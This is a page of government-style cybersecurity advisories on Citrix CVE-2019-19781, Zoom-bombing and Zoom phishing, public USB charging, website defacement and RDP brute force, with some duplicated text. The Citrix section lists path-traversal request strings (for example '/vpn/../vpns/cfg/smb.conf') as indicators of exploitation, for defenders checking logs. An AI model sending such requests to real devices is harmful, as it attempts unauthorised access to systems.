
Guidance on Defending Against Video Teleconferencing (VTC) Hijacking and Zoom-bombing
The Federal Bureau of Investigation (FBI) has released an article on defending against video-teleconferencing (VTC) hijacking (referred to as “Zoom-bombing” when attacks are to the Zoom VTC platform).
Read More
Smartphone or Tablet Hacked
If you use public Wi-Fi or USB power charging stations at airports, hotels, and
other
locations, make sure to use a VPN when using public Wi-Fi, and always make sure
to use a
USB data blocker...

Website Defacement
CWebsite defacement is an attack on a website that changes the visual appearance of the site or webpage. It is similar to drawing graffiti on a wall, only it happens virtually as a kind of electronic graffiti and is a form of vandalism.
Read More
Advisory On RDP Brute Force Attacks
A way for employees to access corporate devices is by using Remote Desktop Protocol (RDP). Remote Desktop is a remote management tool which allows you to connect to any computer and take over the desktop.
Read More
Alert Regarding Vulnerability (CVE-2019-19781) in Citrix Products
CERT-GH confirmed that information including Proof-of-Concept code about a
vulnerability
(CVE-2019-19781) in Citrix Application Delivery Controller and Citrix Gateway
has been
made public. A remote attacker leveraging this vulnerability may execute
arbitrary code.

Avoid Phishing Scams
Scammers use email or text messages to trick you into giving them your personal information. They may try to steal your passwords, account numbers, or Social Security numbers.
Read More
ZOOM PHISING ATTACKS
Individuals and businesses have become increasingly reliant on video conferencing to stay connected during the Covid-19 outbreak, hence working from home. Organizations have adapted having online meetings and webinars with the use of platforms such as Cisco WebEx, Microsoft Teams, Slack and Zoom.
Read MoreAlert Regarding Vulnerability (CVE-2019-19781) in Citrix Products
CERT-GH confirmed that information including Proof-of-Concept code
about a
vulnerability (CVE-2019-19781) in Citrix Application Delivery Controller and Citrix
Gateway has
been made public. A remote attacker leveraging this vulnerability may execute arbitrary
code.
On January 12, 2020, Bad Packets released information about scanning activities that
appeared to
be leveraging the vulnerability.
Products affected by these vulnerabilities include:
- Citrix ADC and Citrix Gateway version 13.0
- Citrix ADC and NetScaler Gateway version 12.1
- Citrix ADC and NetScaler Gateway version 12.0
- Citrix ADC and NetScaler Gateway version 11.1
- Citrix NetScaler ADC and NetScaler Gateway version 10.5
- Citrix SD-WAN WANOP software and appliance model 4000
- Citrix SD-WAN WANOP software and appliance model 4100
- Citrix SD-WAN WANOP software and appliance model 5000
- Citrix SD-WAN WANOP software and appliance model 5100
The method of confirming whether this vulnerability is exploited is as follows;
- Check if there is any access to the device from a suspicious IP
address.
- The log of HTTP traffic to the device is recorded in httpaccess.log and httperror.log
- Check whether traffic that exploits the vulnerability is recorded in
the
device
log.
- If the Proof-of-Concept code that exploits this
vulnerability is
executed, traffic including the following string is recorded
in the
device.
/vpns/
/vpn/../vpns/cfg/smb.conf
/vpn/../vpns/portal/scripts/newbm.pl
/vpn/../vpns/portal/backdoor.xml
/vpns/portal/scripts/newbm.pl
- If the Proof-of-Concept code that exploits this
vulnerability is
executed, traffic including the following string is recorded
in the
device.
- Check the files under the following directory on the device.
- If there is a recently created unknown xml file, the file is
a
malicious file
created by an attacker, it is possible that an attack has
been
already conducted to compromise the device.
/var/tmp/netscaler/portal/templates
/netscaler/portal/templates
- If there is a recently created unknown xml file, the file is
a
malicious file
created by an attacker, it is possible that an attack has
been
already conducted to compromise the device.
-
Check device processes and corn jobs
- Execute commands on the device to check if there is any process or corn job running by the user "nobody".
- If this vulnerability is exploited, processes are executed by a user named "nobody". If such processes are running, it is possible that an attack has been already conducted to compromise the device.
You can also Download and Run the citrix-vuln-checker.py script in your terminal to check if your CITRIX SERVER is vulnerable to the CVE-2019-19781 https://github.com/inveteck/citrix-vuln-checker
References
Inveteck Global https://github.com/inveteck/citrix-vuln-checker
As of January 17, 2020, Citrix has not provided solution for this
vulnerability.
Please consider applying "V. Mitigation" or discontinuing the use of the
products.
Also, Citrix is planning to provide versions addressing the
vulnerability on the
following dates.
January 24, 2020
- Citrix NetScaler ADC and NetScaler Gateway version 10.5
On January 24, Citrix released the version 10.5 of Citrix NetScaler ADC
and
NetScaler Gateway that addresses this vulnerability. Since attacks
leveraging
the vulnerability are still being observed, we would recommend to apply
solution
and check whether system has been compromised as soon as possible.
Please consider to apply the following mitigation.
- Restrict unnecessary traffic by firewall, etc
- Apply workarounds provided by Citrix
Citrix Systems
Mitigation Steps for CVE-2019-19781
https://support.citrix.com/article/CTX267679
According to Citrix information, Citrix ADC version 12.1 builds
51.16,51.19 and
builds prior to 50.31 have bugs and mitigation settings are not applied.
It is
recommended to update to a build that is not affected by this bug in
order to
properly apply the mitigation.
Guidance on Defending Against Video Teleconferencing (VTC) Hijacking and Zoom-bombing
The Federal Bureau of Investigation (FBI) has released an article on
defending against video-teleconferencing (VTC) hijacking (referred to as “Zoom-bombing”
when attacks are to the Zoom VTC platform). Many organizations and individuals are
increasingly dependent on VTC platforms, such as Zoom and Microsoft Teams, to stay
connected during the Coronavirus Disease 2019 (COVID-19) pandemic. The FBI has released
this guidance in response to an increase in reports of VTC hijacking.
The National Cyber Security Centre encourages users and administrators to review the FBI
Article (Click Here) as well as the following steps to improve VTC cybersecurity:
- Ensure meetings are private, either by requiring a password for entry or controlling guest access from a waiting room.
- Consider security requirements when selecting vendors. For example, if end-to-end encryption is necessary, does the vendor offer it?
- Ensure VTC software is up to date. See Understanding Patches and Software Updates.
Microsoft https://www.us-cert.gov/ncas/current-activity/2020/04/02/fbi-releases-guidance-defending-against-vtc-hijacking-and-zoom
Stopping your smartphone or tablet being hacked at an airport, hotel or café.
If you use public Wi-Fi or USB power charging stations at airports,
hotels,
and other locations, make sure to use a VPN when using public Wi-Fi, and always make
sure to use
a USB data blocker, also known as a USB condom when using the public USB power charging
stations.
While the risk from using public USB power charging stations at airports, hotels, and
other
locations might be minimal, a USB port is a gateway into a device, and allowing any
scabby
charging station access to your devices seems overall like a bad idea.
The USB data blocker blocks all data transfer, but the built-in chip detects the type of
device
which is connected and swaps between Apple, Universal, and Samsung charging
specifications, thus
enabling the fastest charge possible.
Website Defacement
CERT-GH of the National Cyber Security Centre provides the following advisory.
This is to advise all Web host users, managers and business owners in Ghana of cases of
website defacement identified by CERT-GH
Website defacement is an attack on a website that changes the visual appearance of the site or webpage. It is similar to drawing graffiti, only it happens virtually as a kind of electronic graffiti and is a form of vandalism. These are typically the work of hackers, who break into a web server and replace the content the hosted website with one of their own. Attackers have different motivations when they deface a website. Political motivation is one, which is often used to spread messages by “cyber protesters” or hacktivists. Other attackers may choose to deface a website for fun – to mock site owners by finding website vulnerabilities and exploiting these to deface a website. In both cases, website owners face damages to their business and reputation once their sites are defaced.
Consequences of website defacement vary. Here are some consequences an organization may face after its website has been attacked.
- Potential Data breach: Due to the noticeable nature of web defacement, some hackers use them as a form of diversion. With everyone’s attention focused on the defacement, these hackers can then carry out more sinister activities without getting detected immediately. For instance, they could steal sensitive information, install malware, and perform privilege escalation or carry out other nefarious acts.
- Losing Customers: Visitors may be redirected to sites teeming with malicious code. They might be prompted to download malware onto their system or it downloads itself, undetected. In such cases, your regular and new visitors may be concerned about visiting your page in the future and you can potentially lose customers.
- Impact on PageRank and Traffic: Search engines rank your website according to a number of factors. A higher ranking website comes up first in the results of a search query. If your defaced website is flagged or identified as causing harm to its users, a search engine such as Google might add you to its blacklist. This means that you can lose up to 95% of website traffic that could be gained from Google search results.
- Effect on Brand Image: Internet users worry about safety during their online experiences. If they notice you have failed to establish security measures on your website, they automatically conclude that you are either completely negligent in securing your website or are extremely ignorant about information security challenges and threads. Such conclusions can be devastating for your organization’s image.
- Security audits and penetration testing: Unpatched systems are a prime target for hackers since they are susceptible to numerous vulnerabilities. Other known vulnerabilities are unused open ports on servers which allow attackers to connect to servers without authentication, allowing remote execution of malicious code when connected to an unsecured networks. Regular security audits are helpful in evaluating the security posture of an IT infrastructure (operating systems, service and application flaws, improper configurations, or risky end-user behaviour) and better protect the systems hosting the website
- Defend yourself against SQL injection attacks: SQL injection attacks involve the use of SQL statements inserted into data entry fields in order to affect the execution of predefined SQL statements. With the modified SQL statements, attackers have extracted sensitive information, obtained the authentication details of registered users on a website and corrupted databases making websites unusable. To defend against SQL injection, use parameterized statements that make sure that the inputs passed into SQL statements are treated in a safe manner. Escaping inputs from input fields which treats all inputs, especially special characters as part of the string, not the end of the string, also defends against SQL Injection
- Defend yourself against Cross-site Scripting (XSS) attacks: Cross site scripting is when an attacker tries to pass scripting code into a web form to attempt to run unauthorized code on the website. It tricks an application into sending malicious script through the browser, which believes the scropt is coming from the trusted website. Each time an end user accesses the affected page, their browser will download and run the malicious script as if it was part of the page. To defend against XSS, validate the input which ensures the application renders the correct data and prevents malicious data from doing harm to the site, database and users.
- Use defacement monitoring and detection tools: The effects of web attacks are leaving companies with a short time to react and perform damage control after an incident. Defacement monitoring and detection tools are one of the best solutions to monitor any defacement or unauthorized integrity change in the websites. These are some of the most used monitoring and detection tools: Banff Cyber’s WebOrion Defacement Monitor, Site24x7 and Nagios. Careful evaluation and configuration of the tools to detect both full and partial defacements involving HTML as well as linked images, scripts and stylesheets are important to ensure an effective tool is in place.
- Prepare to respond to defacement incidents: What do we do when our website is defaced? A good detection tool only tells you when your website is defaced but not the action that is to be taken. It is therefore important to put in place a set of incident response procedures, and ensure that you have the right personnel to respond to a web defacement. The technical response team will likely involve the security manager, web masters/web developers and the web server team. It may also be important to have corporate communications prepare a public message to preserve the web reputation of the company and also have a maintenance webpage to inform customers. Make an action plan for handling the restoration process that will shorten the time for recovery.
Here are general minimal tips and advice from CERT-GH as precaution steps:
- Do not click on any email attachment or links provided in emails, social media platforms or websites that you are not familiar with.
- Apply security updates and patches and stay up to date with the latest system versions.
- Report the incident to CERT-Gh on report@cybersecurity.gov.gh
- Share the advisory and precaution steps among users in your organization and communities for awareness purposes.
Best Advice:
Website defacement can result in damage to a site’s reputation, loss of valuable information and user privacy, loss of money and loss of time. It is therefore expedient to put mitigation and prevention techniques in place. To conclude, keep these tips:
- Keep software up to date
- Watch out for SQL injection
- Protect against XSS attacks
- Beware of error messages
- Validate on both the browser and the server side
- Check your passwords
- Avoid file uploads by users
- User HTTPS
- Get website security tools
How to Recognize and Avoid Phishing Scams
Scammers use email or text messages to trick you into giving them your personal information. They may try to steal your passwords, account numbers, or Social Security numbers. If they get that information, they could gain access to your email, bank, or other accounts. Scammers launch thousands of phishing attacks every day and they’re often successful. But there are several things you can do to protect yourself.
Scammers use familiar company names or pretend to be someone you know. They ask you to click on a link or give passwords or bank account numbers. If you click on the link, they can install programs that lock you out of your computer and can steal your personal information. They pressure you to act now – or something bad will happen.
Check it out.
Look up the website or phone number for the company or person who’s
contacting you. Call that company or person directly. Use a number you
know to be correct, not the number in the email or text. Tell them about
the message you got
Look for scam tip-offs.
- You don’t have an account with the company.
- The message is missing your name or uses bad grammar and spelling.
- The person asks for personal information, including passwords.
- But note: some phishing schemes are sophisticated and look very real, so check it out and protect yourself.
- Just place your cursor on the link you have been asked to click to verify the web address.
Keep your computer security up to date by installing an antivirus, update
it regularly and back up your data often.
Consider multi-factor authentication – a second step to verify who you
are, like a text with a code – for accounts that support it.
Change any compromised passwords right away and don’t use them for
any other accounts.
Advisory On RDP Brute Force Attacks
A way for employees to access corporate devices is by using Remote
Desktop
Protocol (RDP). Remote Desktop is a remote management tool which allows you to connect
to any
computer and take over the desktop. It’s like you are sitting and looking at your own
computer,
only remotely. It is highly used especially during this pandemic situation, for those
who have
moved to work from home. If poorly configured, it might be vulnerable to attacks.
- RDP devices are exposed to the internet
- RDP ports and services are being used as the initial attack vector in ransomware attacks
- Brute-force attacks have been increasing
- After successfully gaining credentials, attackers get full access to the corporate IT resources
- Leakage of sensitive information
- Spread of malware infection
- Use strong and complex passwords on RDP servers
- Use corporate VPN when connecting remote devices
- Use two-factor authentication where possible
- Disable RDP port (3389) when not in use
- Enable account lockout policies to block brute-force attacks after number of failed login attempts
- Enable account audit policies to see login errors
References
https://www.bleepingcomputer.com/news/security/rdp-brute-force-attacks-are-skyrocketing-due-to-remote-working/
BACKGROUND
- Out of the blue, you receive an email, text, or social media message that includes Zoom’s logo and a message saying something like, ‘Your Zoom account has been suspended. Click here to reactivate.’ or ‘You missed a meeting, click here to see the details and reschedule’
- You might even receive a message welcoming you to the platform and requesting you click on a link to activate your account
- Double check the sender’s information. Zoom.com and Zoom.us are the only official domains for Zoom. If an email comes from a similar looking domain that doesn’t quite match the official domain name, it’s probably a scam.
- Never click on links in unsolicited emails. Phishing scams always involve getting an unsuspecting individual to click on a link or file sent in an email that will download dangerous malware onto their computer. If you get an unsolicited email and you aren’t sure who it really came from, never click on any links, files, or images it may contain
- Resolve issues directly. If you receive an email stating there is a problem with your account and you aren’t sure if it is legitimate, contact the company directly. Go to the official website by typing the name in your browser and find the ‘Contact Support’ feature to get help.”
- Emails with subject line “Zoom Account” in the subject line and includes a welcome message for new users. Users are persuaded into clicking on a link to activate their Zoom account by entering their login credentials on a fake website controlled by cyber criminals
- Emails with subject line “Missed Zoom Meeting” informing users of missing a meeting. The message includes a link “Check your missed conference”, which take users to fake websites where user credentials are needed to login
- Emails with subject line “Meeting Canceled – Could we do a Zoom call”, target manufacturing, energy, IT, construction, marketing, technology, and other industrial firms with malware, not phishing. Cyber Attackers try to gain access to computer files, personal information such as usernames and passwords, and credit card details
- Emails that provoke a sense of urgency and panic, hence encouraging recipients to click on malicious links.
- Pay close attention to the spelling of an email or web page, if there are inconsistencies users should be cautious
- Take caution when opening unrecognize emails. Especial emails from unknown people must be verified by doing background checks to know if the account holder is someone you know. Please do not reply or forward emails from unknown people.
- Refrain from downloading files or clicking links in an email from unknown senders and any correspondence that you were not expecting. Always check the sender’s details and the embedded URL by hovering (do not click) your mouse over the sender’s email address and any links included.
- Use strong and unique passwords for every account. Never use the same password twice. Using a password manager that can auto-generate a robust password is recommended
- Ensure that all programs and operating system (OS) installed on your device are updated with the latest security patches.
- The only official domains for the Zoom platform are zoom.us or zoom.com and look out for spoofed domains that sounds like the real domain when you read it, such as zooom.us.
- The use of multi-factor authentication helps secure your account.
- Users can reach out directly to zoom on their official websites, if worried that their accounts have issues.
- Establish the meetings validity. By personally communicating with the sender and asking if the invitation is valid or not.